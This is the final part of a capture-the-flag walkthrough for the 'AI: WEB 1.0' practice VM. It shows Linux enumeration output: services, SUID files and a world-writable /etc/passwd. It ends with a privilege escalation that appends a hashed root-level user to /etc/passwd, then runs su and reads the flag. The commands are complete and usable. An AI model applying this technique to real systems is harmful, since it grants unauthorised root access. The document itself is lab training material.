-rw-r–r– 1 root root 754 Jan 28 2018 initrd-switch-root.target
-rw-r–r– 1 root root 763 Jan 28 2018 initrd.target
-rw-r–r– 1 root root 541 Jan 28 2018 kexec.target
-rw-r–r– 1 root root 435 Jan 28 2018 local-fs-pre.target
-rw-r–r– 1 root root 547 Jan 28 2018 local-fs.target
-rw-r–r– 1 root root 445 Jan 28 2018 machine.slice
-rw-r–r– 1 root root 532 Jan 28 2018 multi-user.target
-rw-r–r– 1 root root 505 Jan 28 2018 network-online.target
-rw-r–r– 1 root root 502 Jan 28 2018 network-pre.target
-rw-r–r– 1 root root 521 Jan 28 2018 network.target
-rw-r–r– 1 root root 554 Jan 28 2018 nss-lookup.target
-rw-r–r– 1 root root 513 Jan 28 2018 nss-user-lookup.target
-rw-r–r– 1 root root 394 Jan 28 2018 paths.target
-rw-r–r– 1 root root 592 Jan 28 2018 poweroff.target
-rw-r–r– 1 root root 417 Jan 28 2018 printer.target
-rw-r–r– 1 root root 745 Jan 28 2018 proc-sys-fs-binfmt_misc.automount
-rw-r–r– 1 root root 655 Jan 28 2018 proc-sys-fs-binfmt_misc.mount
-rw-r–r– 1 root root 583 Jan 28 2018 reboot.target
-rw-r–r– 1 root root 549 Jan 28 2018 remote-cryptsetup.target
-rw-r–r– 1 root root 436 Jan 28 2018 remote-fs-pre.target
-rw-r–r– 1 root root 522 Jan 28 2018 remote-fs.target
-rw-r–r– 1 root root 492 Jan 28 2018 rescue.target
-rw-r–r– 1 root root 540 Jan 28 2018 rpcbind.target
-rw-r–r– 1 root root 442 Jan 28 2018 shutdown.target
-rw-r–r– 1 root root 402 Jan 28 2018 sigpwr.target
-rw-r–r– 1 root root 460 Jan 28 2018 sleep.target
-rw-r–r– 1 root root 449 Jan 28 2018 slices.target
-rw-r–r– 1 root root 420 Jan 28 2018 smartcard.target
-rw-r–r– 1 root root 396 Jan 28 2018 sockets.target
-rw-r–r– 1 root root 420 Jan 28 2018 sound.target
-rw-r–r– 1 root root 503 Jan 28 2018 suspend.target
-rw-r–r– 1 root root 393 Jan 28 2018 swap.target
-rw-r–r– 1 root root 795 Jan 28 2018 sys-fs-fuse-connections.mount
-rw-r–r– 1 root root 767 Jan 28 2018 sys-kernel-config.mount
-rw-r–r– 1 root root 710 Jan 28 2018 sys-kernel-debug.mount
-rw-r–r– 1 root root 558 Jan 28 2018 sysinit.target
-rw-r–r– 1 root root 1.4K Jan 28 2018 syslog.socket
-rw-r–r– 1 root root 592 Jan 28 2018 system-update.target
-rw-r–r– 1 root root 445 Jan 28 2018 system.slice
-rw-r–r– 1 root root 704 Jan 28 2018 systemd-ask-password-console.path
-rw-r–r– 1 root root 632 Jan 28 2018 systemd-ask-password-wall.path
-rw-r–r– 1 root root 564 Jan 28 2018 systemd-initctl.socket
-rw-r–r– 1 root root 1.2K Jan 28 2018 systemd-journald-dev-log.socket
-rw-r–r– 1 root root 882 Jan 28 2018 systemd-journald.socket
-rw-r–r– 1 root root 631 Jan 28 2018 systemd-networkd.socket
-rw-r–r– 1 root root 657 Jan 28 2018 systemd-rfkill.socket
-rw-r–r– 1 root root 490 Jan 28 2018 systemd-tmpfiles-clean.timer
-rw-r–r– 1 root root 635 Jan 28 2018 systemd-udevd-control.socket
-rw-r–r– 1 root root 610 Jan 28 2018 systemd-udevd-kernel.socket
-rw-r–r– 1 root root 435 Jan 28 2018 time-sync.target
-rw-r–r– 1 root root 445 Jan 28 2018 timers.target
-rw-r–r– 1 root root 457 Jan 28 2018 umount.target
-rw-r–r– 1 root root 432 Jan 28 2018 user.slice
-rw-r–r– 1 root root 493 Jan 25 2018 ssh.service
-rw-r–r– 1 root root 244 Jan 25 2018 ssh@.service
lrwxrwxrwx 1 root root 9 Jan 18 2018 sudo.service -> /dev/null
-rw-r–r– 1 root root 155 Jan 17 2018 phpsessionclean.service
-rw-r–r– 1 root root 144 Jan 17 2018 phpsessionclean.timer
-rw-r–r– 1 root root 216 Jan 16 2018 ssh.socket
-rw-r–r– 1 root root 462 Jan 15 2018 mysql.service
-rw-r–r– 1 root root 741 Dec 18 2017 accounts-daemon.service
-rw-r–r– 1 root root 246 Nov 20 2017 apport-forward.socket
-rw-r–r– 1 root root 142 Nov 20 2017 apport-forward@.service
-rw-r–r– 1 root root 251 Nov 16 2017 cron.service
-rw-r–r– 1 root root 266 Aug 15 2017 ufw.service
-rw-r–r– 1 root root 115 Apr 22 2017 acpid.path
-rw-r–r– 1 root root 234 Apr 22 2017 acpid.service
-rw-r–r– 1 root root 115 Apr 22 2017 acpid.socket
-rw-r–r– 1 root root 188 Feb 24 2014 rsync.service

/lib/systemd/system/apache2.service.d:
total 4.0K
-rw-r–r– 1 root root 42 Jul 16 18:14 apache2-systemd.conf

/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Jul 22 16:45 systemd-initctl.socket -> ../systemd-initctl.socket
lrwxrwxrwx 1 root root 32 Jul 22 16:45 systemd-journald-audit.socket -> ../systemd-journald-audit.socket
lrwxrwxrwx 1 root root 34 Jul 22 16:45 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
lrwxrwxrwx 1 root root 26 Jul 22 16:45 systemd-journald.socket -> ../systemd-journald.socket
lrwxrwxrwx 1 root root 31 Jul 22 16:45 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 root root 30 Jul 22 16:45 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket
lrwxrwxrwx 1 root root 14 Jun 10 18:05 dbus.socket -> ../dbus.socket

/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 20 Jul 22 16:45 cryptsetup.target -> ../cryptsetup.target
lrwxrwxrwx 1 root root 22 Jul 22 16:45 dev-hugepages.mount -> ../dev-hugepages.mount
lrwxrwxrwx 1 root root 19 Jul 22 16:45 dev-mqueue.mount -> ../dev-mqueue.mount
lrwxrwxrwx 1 root root 28 Jul 22 16:45 kmod-static-nodes.service -> ../kmod-static-nodes.service
lrwxrwxrwx 1 root root 36 Jul 22 16:45 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
lrwxrwxrwx 1 root root 32 Jul 22 16:45 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
lrwxrwxrwx 1 root root 26 Jul 22 16:45 sys-kernel-config.mount -> ../sys-kernel-config.mount
lrwxrwxrwx 1 root root 25 Jul 22 16:45 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
lrwxrwxrwx 1 root root 36 Jul 22 16:45 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
lrwxrwxrwx 1 root root 25 Jul 22 16:45 systemd-binfmt.service -> ../systemd-binfmt.service
lrwxrwxrwx 1 root root 30 Jul 22 16:45 systemd-hwdb-update.service -> ../systemd-hwdb-update.service
lrwxrwxrwx 1 root root 32 Jul 22 16:45 systemd-journal-flush.service -> ../systemd-journal-flush.service
lrwxrwxrwx 1 root root 27 Jul 22 16:45 systemd-journald.service -> ../systemd-journald.service
lrwxrwxrwx 1 root root 36 Jul 22 16:45 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service
lrwxrwxrwx 1 root root 31 Jul 22 16:45 systemd-modules-load.service -> ../systemd-modules-load.service
lrwxrwxrwx 1 root root 30 Jul 22 16:45 systemd-random-seed.service -> ../systemd-random-seed.service
lrwxrwxrwx 1 root root 25 Jul 22 16:45 systemd-sysctl.service -> ../systemd-sysctl.service
lrwxrwxrwx 1 root root 37 Jul 22 16:45 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
lrwxrwxrwx 1 root root 33 Jul 22 16:45 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
lrwxrwxrwx 1 root root 31 Jul 22 16:45 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 root root 24 Jul 22 16:45 systemd-udevd.service -> ../systemd-udevd.service
lrwxrwxrwx 1 root root 30 Jul 22 16:45 systemd-update-utmp.service -> ../systemd-update-utmp.service
lrwxrwxrwx 1 root root 30 Apr 4 15:41 plymouth-read-write.service -> ../plymouth-read-write.service
lrwxrwxrwx 1 root root 25 Apr 4 15:41 plymouth-start.service -> ../plymouth-start.service

/lib/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Jul 22 16:45 getty-static.service -> ../getty-static.service

/lib/systemd/system/graphical.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Jul 22 16:45 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/local-fs.target.wants:
total 0
lrwxrwxrwx 1 root root 29 Jul 22 16:45 systemd-remount-fs.service -> ../systemd-remount-fs.service

/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Jul 22 16:45 getty.target -> ../getty.target
lrwxrwxrwx 1 root root 33 Jul 22 16:45 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
lrwxrwxrwx 1 root root 25 Jul 22 16:45 systemd-logind.service -> ../systemd-logind.service
lrwxrwxrwx 1 root root 39 Jul 22 16:45 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 32 Jul 22 16:45 systemd-user-sessions.service -> ../systemd-user-sessions.service
lrwxrwxrwx 1 root root 15 Jun 10 18:05 dbus.service -> ../dbus.service
lrwxrwxrwx 1 root root 29 Apr 4 15:41 plymouth-quit-wait.service -> ../plymouth-quit-wait.service
lrwxrwxrwx 1 root root 24 Apr 4 15:41 plymouth-quit.service -> ../plymouth-quit.service

/lib/systemd/system/rescue.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Jul 22 16:45 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/timers.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Jul 22 16:45 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer

/lib/systemd/system/user@.service.d:
total 4.0K
-rw-r–r– 1 root root 125 Jul 22 16:45 timeout.conf

/lib/systemd/system/rc-local.service.d:
total 4.0K
-rw-r–r– 1 root root 290 Jul 22 16:45 debian.conf

/lib/systemd/system/halt.target.wants:
total 0
lrwxrwxrwx 1 root root 24 Apr 4 15:41 plymouth-halt.service -> ../plymouth-halt.service

/lib/systemd/system/initrd-switch-root.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Apr 4 15:41 plymouth-start.service -> ../plymouth-start.service
lrwxrwxrwx 1 root root 31 Apr 4 15:41 plymouth-switch-root.service -> ../plymouth-switch-root.service

/lib/systemd/system/kexec.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Apr 4 15:41 plymouth-kexec.service -> ../plymouth-kexec.service

/lib/systemd/system/poweroff.target.wants:
total 0
lrwxrwxrwx 1 root root 28 Apr 4 15:41 plymouth-poweroff.service -> ../plymouth-poweroff.service

/lib/systemd/system/reboot.target.wants:
total 0
lrwxrwxrwx 1 root root 26 Apr 4 15:41 plymouth-reboot.service -> ../plymouth-reboot.service

/lib/systemd/system/runlevel1.target.wants:
total 0

/lib/systemd/system/runlevel2.target.wants:
total 0

/lib/systemd/system/runlevel3.target.wants:
total 0

/lib/systemd/system/runlevel4.target.wants:
total 0

/lib/systemd/system/runlevel5.target.wants:
total 0

/lib/systemd/network:
total 16K
-rw-r–r– 1 root root 645 Jan 28 2018 80-container-host0.network
-rw-r–r– 1 root root 718 Jan 28 2018 80-container-ve.network
-rw-r–r– 1 root root 704 Jan 28 2018 80-container-vz.network
-rw-r–r– 1 root root 412 Jan 28 2018 99-default.link

/lib/systemd/system-generators:
total 240K
-rwxr-xr-x 1 root root 23K Jul 22 16:45 systemd-cryptsetup-generator
-rwxr-xr-x 1 root root 10K Jul 22 16:45 systemd-debug-generator
-rwxr-xr-x 1 root root 31K Jul 22 16:45 systemd-fstab-generator
-rwxr-xr-x 1 root root 14K Jul 22 16:45 systemd-getty-generator
-rwxr-xr-x 1 root root 26K Jul 22 16:45 systemd-gpt-auto-generator
-rwxr-xr-x 1 root root 10K Jul 22 16:45 systemd-hibernate-resume-generator
-rwxr-xr-x 1 root root 10K Jul 22 16:45 systemd-rc-local-generator
-rwxr-xr-x 1 root root 10K Jul 22 16:45 systemd-system-update-generator
-rwxr-xr-x 1 root root 31K Jul 22 16:45 systemd-sysv-generator
-rwxr-xr-x 1 root root 14K Jul 22 16:45 systemd-veritysetup-generator
-rwxr-xr-x 1 root root 286 Jun 21 14:07 friendly-recovery
-rwxr-xr-x 1 root root 19K Jun 5 06:41 snapd-generator
-rwxr-xr-x 1 root root 11K Jun 4 09:59 lvm2-activation-generator
-rwxr-xr-x 1 root root 4.8K May 11 05:17 cloud-init-generator
lrwxrwxrwx 1 root root 22 May 9 17:11 netplan -> ../../netplan/generate

/lib/systemd/system-preset:
total 4.0K
-rw-r–r– 1 root root 951 Jan 28 2018 90-systemd.preset

/lib/systemd/system-sleep:
total 8.0K
-rwxr-xr-x 1 root root 219 Apr 29 10:13 unattended-upgrades
-rwxr-xr-x 1 root root 92 Feb 22 2018 hdparm

/lib/systemd/system-shutdown:
total 4.0K
-rwxr-xr-x 1 root root 160 Apr 10 14:14 mdadm.shutdown

### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.8.21p2

[-] MYSQL version:
mysql Ver 14.14 Distrib 5.7.27, for Linux (x86_64) using EditLine wrapper

[-] Apache version:
Server version: Apache/2.4.29 (Ubuntu)
Server built: 2019-08-26T13:41:23

[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data

[-] Installed Apache modules:
Loaded Modules:
core_module (static)
so_module (static)
watchdog_module (static)
http_module (static)
log_config_module (static)
logio_module (static)
version_module (static)
unixd_module (static)
headers_module (shared)
access_compat_module (shared)
alias_module (shared)
auth_basic_module (shared)
authn_core_module (shared)
authn_file_module (shared)
authz_core_module (shared)
authz_host_module (shared)
authz_user_module (shared)
autoindex_module (shared)
deflate_module (shared)
dir_module (shared)
env_module (shared)
filter_module (shared)
mime_module (shared)
mpm_prefork_module (shared)
negotiation_module (shared)
php7_module (shared)
reqtimeout_module (shared)
setenvif_module (shared)
status_module (shared)

### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/curl

[-] Can we read/write sensitive files:
-rw-r–r– 1 www-data www-data 1664 Aug 21 09:19 /etc/passwd
-rw-r–r– 1 root root 747 Aug 20 12:51 /etc/group
-rw-r–r– 1 root root 581 Apr 9 2018 /etc/profile
-rw-r—– 1 root shadow 1181 Aug 20 13:27 /etc/shadow

[-] SUID files:
-rwsr-xr-x 1 root root 40152 May 15 20:43 /snap/core/7270/bin/mount
-rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/7270/bin/ping
-rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/7270/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25 12:09 /snap/core/7270/bin/su
-rwsr-xr-x 1 root root 27608 May 15 20:43 /snap/core/7270/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25 12:09 /snap/core/7270/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25 12:09 /snap/core/7270/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25 12:09 /snap/core/7270/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25 12:09 /snap/core/7270/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25 12:09 /snap/core/7270/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jun 10 22:53 /snap/core/7270/usr/bin/sudo
-rwsr-xr– 1 root systemd-resolve 42992 Jun 10 19:46 /snap/core/7270/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar 4 14:09 /snap/core/7270/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 102600 Jun 21 07:31 /snap/core/7270/usr/lib/snapd/snap-confine
-rwsr-xr– 1 root dip 394984 Jun 12 2018 /snap/core/7270/usr/sbin/pppd
-rwsr-xr-x 1 root root 40152 May 15 20:43 /snap/core/7396/bin/mount
-rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/7396/bin/ping
-rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/7396/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25 12:09 /snap/core/7396/bin/su
-rwsr-xr-x 1 root root 27608 May 15 20:43 /snap/core/7396/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25 12:09 /snap/core/7396/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25 12:09 /snap/core/7396/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25 12:09 /snap/core/7396/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25 12:09 /snap/core/7396/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25 12:09 /snap/core/7396/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jun 10 22:53 /snap/core/7396/usr/bin/sudo
-rwsr-xr– 1 root systemd-resolve 42992 Jun 10 19:46 /snap/core/7396/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar 4 14:09 /snap/core/7396/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 106696 Jul 12 08:55 /snap/core/7396/usr/lib/snapd/snap-confine
-rwsr-xr– 1 root dip 394984 Jun 12 2018 /snap/core/7396/usr/sbin/pppd
-rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-sr-x 1 root root 105336 Jun 5 06:41 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 14328 Mar 27 13:57 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr– 1 root messagebus 42992 Jun 10 18:05 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar 4 12:17 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 76496 Mar 22 19:05 /usr/bin/chfn
-rwsr-xr-x 1 root root 75824 Mar 22 19:05 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 37136 Mar 22 19:05 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 40344 Mar 22 19:05 /usr/bin/newgrp
-rwsr-xr-x 1 root root 37136 Mar 22 19:05 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 22520 Mar 27 13:57 /usr/bin/pkexec
-rwsr-xr-x 1 root root 149080 Jan 18 2018 /usr/bin/sudo
-rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
-rwsr-xr-x 1 root root 59640 Mar 22 19:05 /usr/bin/passwd
-rwsr-xr-x 1 root root 18448 Jun 28 11:05 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 44528 Mar 22 19:05 /usr/bin/chsh
-rwsr-xr-x 1 root root 44664 Mar 22 19:05 /bin/su
-rwsr-xr-x 1 root root 43088 Oct 15 2018 /bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28 11:05 /bin/ping
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 26696 Oct 15 2018 /bin/umount

[-] SGID files:
-rwxr-sr-x 1 root shadow 35632 Apr 9 2018 /snap/core/7270/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 35600 Apr 9 2018 /snap/core/7270/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 62336 Mar 25 12:09 /snap/core/7270/usr/bin/chage
-rwxr-sr-x 1 root systemd-network 36080 Apr 5 2016 /snap/core/7270/usr/bin/crontab
-rwxr-sr-x 1 root mail 14856 Dec 7 2013 /snap/core/7270/usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 22768 Mar 25 12:09 /snap/core/7270/usr/bin/expiry
-rwxr-sr-x 3 root mail 14592 Dec 3 2012 /snap/core/7270/usr/bin/mail-lock
-rwxr-sr-x 3 root mail 14592 Dec 3 2012 /snap/core/7270/usr/bin/mail-touchlock
-rwxr-sr-x 3 root mail 14592 Dec 3 2012 /snap/core/7270/usr/bin/mail-unlock
-rwxr-sr-x 1 root crontab 358624 Mar 4 14:09 /snap/core/7270/usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 27368 May 15 20:43 /snap/core/7270/usr/bin/wall
-rwsr-sr-x 1 root root 102600 Jun 21 07:31 /snap/core/7270/usr/lib/snapd/snap-confine
-rwxr-sr-x 1 root shadow 35632 Apr 9 2018 /snap/core/7396/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 35600 Apr 9 2018 /snap/core/7396/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 62336 Mar 25 12:09 /snap/core/7396/usr/bin/chage
-rwxr-sr-x 1 root systemd-network 36080 Apr 5 2016 /snap/core/7396/usr/bin/crontab
-rwxr-sr-x 1 root mail 14856 Dec 7 2013 /snap/core/7396/usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 22768 Mar 25 12:09 /snap/core/7396/usr/bin/expiry
-rwxr-sr-x 3 root mail 14592 Dec 3 2012 /snap/core/7396/usr/bin/mail-lock
-rwxr-sr-x 3 root mail 14592 Dec 3 2012 /snap/core/7396/usr/bin/mail-touchlock
-rwxr-sr-x 3 root mail 14592 Dec 3 2012 /snap/core/7396/usr/bin/mail-unlock
-rwxr-sr-x 1 root crontab 358624 Mar 4 14:09 /snap/core/7396/usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 27368 May 15 20:43 /snap/core/7396/usr/bin/wall
-rwsr-sr-x 1 root root 106696 Jul 12 08:55 /snap/core/7396/usr/lib/snapd/snap-confine
-rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /sbin/unix_chkpwd
-rwxr-sr-x 1 root utmp 10232 Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwsr-sr-x 1 root root 105336 Jun 5 06:41 /usr/lib/snapd/snap-confine
-rwxr-sr-x 1 root crontab 39352 Nov 16 2017 /usr/bin/crontab
-rwxr-sr-x 1 root tty 14328 Jan 17 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root ssh 362640 Mar 4 12:17 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 71816 Mar 22 19:05 /usr/bin/chage
-rwxr-sr-x 1 root mlocate 43088 Mar 1 2018 /usr/bin/mlocate
-rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
-rwxr-sr-x 1 root tty 30800 Oct 15 2018 /usr/bin/wall
-rwxr-sr-x 1 root shadow 22808 Mar 22 19:05 /usr/bin/expiry

[+] Files with POSIX capabilities set:
/usr/bin/mtr-packet = cap_net_raw+ep

[-] Can’t search *.conf files as no keyword was entered

[-] Can’t search *.php files as no keyword was entered

[-] Can’t search *.log files as no keyword was entered

[-] Can’t search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r–r– 1 root root 2683 Jan 17 2018 /etc/sysctl.conf
-rw-r–r– 1 root root 144 Aug 20 05:07 /etc/kernel-img.conf
-rw-r–r– 1 root root 2584 Feb 1 2018 /etc/gai.conf
-rw-r–r– 1 root root 1260 Feb 26 2018 /etc/ucf.conf
-rw-r–r– 1 root root 1358 Jan 30 2018 /etc/rsyslog.conf
-rw-r–r– 1 root root 403 Mar 1 2018 /etc/updatedb.conf
-rw-r–r– 1 root root 4861 Feb 22 2018 /etc/hdparm.conf
-rw-r–r– 1 root root 6920 Sep 20 2018 /etc/overlayroot.conf
-rw-r–r– 1 root root 3028 Aug 5 19:23 /etc/adduser.conf
-rw-r–r– 1 root root 552 Apr 4 2018 /etc/pam.conf
-rw-r–r– 1 root root 513 Aug 5 19:23 /etc/nsswitch.conf
-rw-r–r– 1 root root 100 Jun 25 2018 /etc/sos.conf
-rw-r–r– 1 root root 92 Apr 9 2018 /etc/host.conf
-rw-r–r– 1 root root 14867 Oct 13 2016 /etc/ltrace.conf
-rw-r–r– 1 root root 5898 Aug 5 19:23 /etc/ca-certificates.conf
-rw-r–r– 1 root root 604 Aug 13 2017 /etc/deluser.conf
-rw-r–r– 1 root root 280 Jun 20 2014 /etc/fuse.conf
-rw-r–r– 1 root root 703 Aug 21 2017 /etc/logrotate.conf
-rw-r–r– 1 root root 350 Aug 5 19:24 /etc/popularity-contest.conf
-rw-r–r– 1 root root 2969 Feb 28 2018 /etc/debconf.conf
-rw-r–r– 1 root root 812 Mar 24 2018 /etc/mke2fs.conf
-rw-r–r– 1 root root 191 Feb 7 2018 /etc/libaudit.conf
-rw-r–r– 1 root root 34 Jan 27 2016 /etc/ld.so.conf

[-] Location and contents (if accessible) of .bash_history file(s):
/home/aiweb1/.bash_history

[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 Aug 5 19:22 .
drwxr-xr-x 14 root root 4096 Aug 20 06:22 ..

### SCAN COMPLETE ####################################

on another terminal

root@kali:~/Downloads# openssl passwd -1 -salt user3 pass123
$1$user3$rAGRVf5p2jYTqtqOW5cPu/

back to shell

www-data@aiweb1:/tmp$ echo ‘raj:$1$user3$rAGRVf5p2jYTqtqOW5cPu/:0:0::/root:/bin/bash’ >>/etc/passwd

www-data@aiweb1:/tmp$ tail /etc/passwd

www-data@aiweb1:/tmp$ su raj

password : pass123

www-data@aiweb1:/tmp$ cd /root

www-data@aiweb1:~# ls

root@aiweb1:~# cat flag.txt
cat flag.txt
####################################################
# #
# AI: WEB 1.0 #
# #
# Congratulation!!! #
# #
# Thank you for penetrate my system. #
# #
# Hope you enjoyed this. #
# #
# #
# flag{cbe5831d864cbc2a104e2c2b9dfb50e5acbdee71} #
# #
####################################################

@SAKSHAM DIXIT